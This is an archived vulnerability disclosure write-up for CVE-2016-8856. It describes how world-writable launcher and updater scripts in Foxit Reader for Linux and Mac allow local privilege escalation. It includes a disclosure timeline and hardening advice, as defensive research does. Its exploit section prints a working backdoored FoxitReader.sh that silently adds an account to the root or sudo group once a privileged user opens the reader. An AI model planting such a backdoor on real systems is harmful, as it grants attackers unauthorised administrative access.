[Archive] CVE-2016-8856: Foxit Reader for Linux and Mac: Local Privilege Escalation Writeup
Originally published on: 20 October 2016
TL;DR: I found a local privilege escalation bug in Foxit Reader for Mac and Linux. Random find, had to run ls -la to find this. The issue has been assigned CVE-2016-8856.
Introduction
Recently, I stumbled on a very simple bug in Foxit Reader for Mac and Linux (From here on, just Foxit Reader). The vulnerability was caused by improper file permissions granted on core Foxit Reader's files on Linux and Mac systems. An attacker with a low privilege access could've exploited this vulnerability to elevate their privileges, execute commands as a higher privileged user, or both.
The version affected were:
Foxit Reader for Mac 2.1.0.0804 and earlier
Foxit Reader for Linux 2.1.0.0805 and earlier
Fixed version has been released and security bulletin is published here - https://www.foxitsoftware.com/support/security-bulletins.php.
About the Bug
The issue is caused by the way Foxit Reader installs itself on the Linux/Mac machine. At the time of installation, user is given a choice of where they want to install Foxit. The default locations for installation are:
On Linux
sudo or root user - /opt/
normal user - ~/opt/
On Mac
/Applications/Foxit Reader.app/
The issue exists in file permissions assigned to the installed files. The installer assigns "rwxrwxrwx" or 0777 permission to most of the files in the installation folder. In these files, the more important ones are:
FoxitReader.sh and updater.sh on Linux (tested on Debian 8 Jessie)
FoxitReader and updater.app/Contents/MacOS/updater on OS X (tested on Yosemite)
These files are used to launch Foxit Reader and update it, respectively. Since, these files are world-writable, any logged in user with limited privileges can write to these files. After that, whenever a privileged user will open the Foxit Reader application, attacker's custom code would run.
Reproduction/ Exploit Example
The steps described below show how the vulnerability could be exploited on a Linux-based OS. We have tested this on Debian 8.
Search for Foxit reader installation in the system. If not found on above mentioned default locations, you can use following command to search it in system:
find / -iname foxit\* 2> /dev/null
2. Go to installation folder, generally foxitsoftware/foxitreader/.
3. Open FoxitReader.sh and replace the content with this:
#!/bin/bash
appname="FoxitReader"
selfpath="/opt/foxitsoftware/foxitreader"
LD_LIBRARY_PATH=$selfpath/lib:$selfpath/platforms:$selfpath/printsupport:$selfpath/rmssdk:$selfpath/sensors:$selfpath/imageformats:$selfpath/platforminputcontexts:$LD_LIBRARY_PATH
export LD_LIBRARY_PATH
# Backdoor starts from here
if [ "$(id | grep root | wc -l)" == 1 ]
then
adduser temp root
elif [ "$(groups | grep sudo | wc -l)" == 1 ]
then
gksudo -- bash -c 'foxit_command_which_does_not_exist_but_hides_our_original_command 2> /dev/null; sudo adduser temp sudo;'
fi
# Backdoor ends
exec "$selfpath/$appname" "$@"
4. Wait for root/sudo user to open Foxit Reader.
5. ???
6. Profit.
CVSS
CVSS v3 Base Score: 7.8 High
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Timeline
18-09-2016 Vendor notified about the bug.
19-09-2016 Vendor replies they are looking into the issue.
28-09-2016 Vendor confirms and fixes the bug.
18-10-2016 New version with fix released. Applied for CVE.
19-10-2016 CVE-2016-8856 assigned to the vulnerability.
Takeaway
Always make sure that files on your system only have the required permissions. Don't be that guy who chmod's 777 on every file. Another issue is files with SUID/SGID bit on them, but that is a topic for another day/blog post.
Also, to search for world writeable files on your system, run the following command:
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
Source <- Excellent source for Linux privilege escalation basic.
Kudos to Foxit's Security Team for prompt acknowledgement and fix.